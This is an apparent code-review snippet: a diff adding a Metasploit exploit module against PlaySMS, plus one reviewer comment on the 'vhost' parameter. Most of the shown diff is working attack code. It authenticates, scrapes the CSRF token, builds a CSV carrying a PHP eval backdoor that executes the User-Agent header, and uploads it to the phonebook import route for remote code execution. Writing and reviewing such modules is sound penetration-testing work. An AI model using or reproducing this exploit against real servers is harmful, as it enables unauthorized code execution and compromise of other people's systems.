modules/exploits/multi/http/playsms_uploadcsv_exec.rb

```diff
@@ -0,0 +1,202 @@
+                'X-CSRF-Token' => csrf,
+                'username' => datastore['USERNAME'],
+                'password' => datastore['PASSWORD']
+            },
+        })
+
+        unless res
+            fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request")
+        end
+
+        # Try to access index page with authenticated cookie.
+        res = send_request_cgi({
+            'method' => 'GET',
+            'uri' => normalize_uri(uri, 'index.php'),
+            'cookie' => cookies,
+        })
+
+        # if we redirect to core_welcome dan we assume we have authenticated cookie.
+        if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
+            print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+            return cookies
+        else
+            fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+            return nil
+        end
+    end
+
+
+    # Tested successfully on Dina: 1.0.1 machine on vulnhub.
+    # Link : https://www.vulnhub.com/entry/dina-101,200/
+    def exploit
+
+        cookies = login
+
+        # Agian CSRF token.
+        res = send_request_cgi({
+            'uri' => normalize_uri(uri, 'index.php'),
+            'method' => 'GET',
+            'vhost' => "#{rhost}:#{rport}",
+            'cookie' => cookies,
+            'vars_get' => {
+                'app' => 'main',
+                'inc' => 'feature_phonebook',
+                'route' => 'import',
+                'op' => 'list',
+            }
+        })
+
+        unless res
+            fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request")
+        end
+
+        # Grabbing CSRF token from body
+        /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+        vprint_good("X-CSRF-Token for upload : #{csrf}")
+
+        # Payload.
+        evil = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
+        #making csv file body
+        final_csv = "Name,Email,Department\n"
+        final_csv << evil
+        final_csv <<',2,3'
+
+        # setup POST request.
+        post_data = Rex::MIME::Message.new
+        post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
+        post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name="fnpb"; filename="agent22.csv"')  #payload
+        data = post_data.to_s
+
+        print_status('Trying to upload malicious CSV file ....')
+        # Lets Send Upload request.
+        res = send_request_cgi({
+            'uri' => normalize_uri(uri, 'index.php'),
+            'method' => 'POST',
+            'vhost' => "#{rhost}:#{rport}",
```

Comment:
Is this necessary? The HTTP library should take care of creating the `vhost` for you.